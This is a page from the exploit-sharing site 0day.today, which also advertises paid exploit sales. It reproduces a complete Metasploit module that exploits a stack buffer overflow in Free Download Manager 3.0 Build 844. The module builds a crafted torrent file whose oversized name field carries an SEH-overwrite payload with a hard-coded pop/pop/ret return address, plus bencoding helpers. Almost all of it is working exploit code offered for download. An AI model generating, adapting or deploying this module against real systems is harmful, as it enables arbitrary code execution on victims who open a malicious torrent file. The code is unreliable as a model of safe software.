0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Free Download Manager Torrent File Parsing Multiple Remote BOF
[==========================================================================================
Free Download Manager Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities
==========================================================================================
# Title: Free Download Manager Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Carsten Eiram
# Published: 2009-11-11
# Verified: yes
view source
print?
##
# $Id: fdm_torrent.rb 7455 2009-11-10 21:52:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Free Download Manager Torrent Parsing Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Free Download Manager
3.0 Build 844. Arbitrary code execution could occur when parsing a
specially crafted torrent file.
},
'License' => MSF_LICENSE,
'Author' => 'jduck',
'Version' => '$Revision: 7455 $',
'References' =>
[
[ 'CVE', '2009-0184' ],
[ 'OSVDB', '54033' ],
[ 'BID', '33555' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 1024,
'DisableNops' => 'True',
'BadChars' => "\x00",
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Free Download Manager 3.0 (Build 844)',
{
'Ret' => 0x7605112c # pop/pop/ret @ msvcp60.dll
}
],
],
'Privileged' => false,
'DisclosureDate' => 'February 2 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.torrent']),
], self.class)
end
def exploit
x = ""
bof = rand_text_alphanumeric(10004) + generate_seh_payload(target.ret)
# hit the end of the stack...
bof << rand_text(20000)
len = rand(10*1024*1024)
info_hash = {
'length' => len,
'name' => bof,
'piece length' => len + rand(262144 - len),
'pieces' => rand_text(20),
}
ann_hash = {
'info' => info_hash,
}
encoded = bencode_hash(ann_hash)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(encoded)
end
# bencoding functions:
#
# http://wiki.theory.org/BitTorrentSpecification
#
def bencode_string(str)
ret = "%d:" % str.length
ret << str
return ret
end
def bencode_int(int)
ret = "i%de" % int
return ret
end
def bencode_item(item)
case item
when Fixnum
return bencode_int(item)
when String
return bencode_string(item)
when Hash
return bencode_hash(item)
else
throw("unsupported bencode data type! " + item.testzt)
end
end
def bencode_list(list)
ret = "l"
list.each do |el|
ret << bencode_item(el)
end
ret << "e"
return ret
end
def bencode_hash(hash)
ret = "d"
hash.keys.sort.each do |k|
ret << bencode_item(k)
ret << bencode_item(hash[k])
end
ret << "e"
return ret
end
end
# 0day.today [2024-12-26] #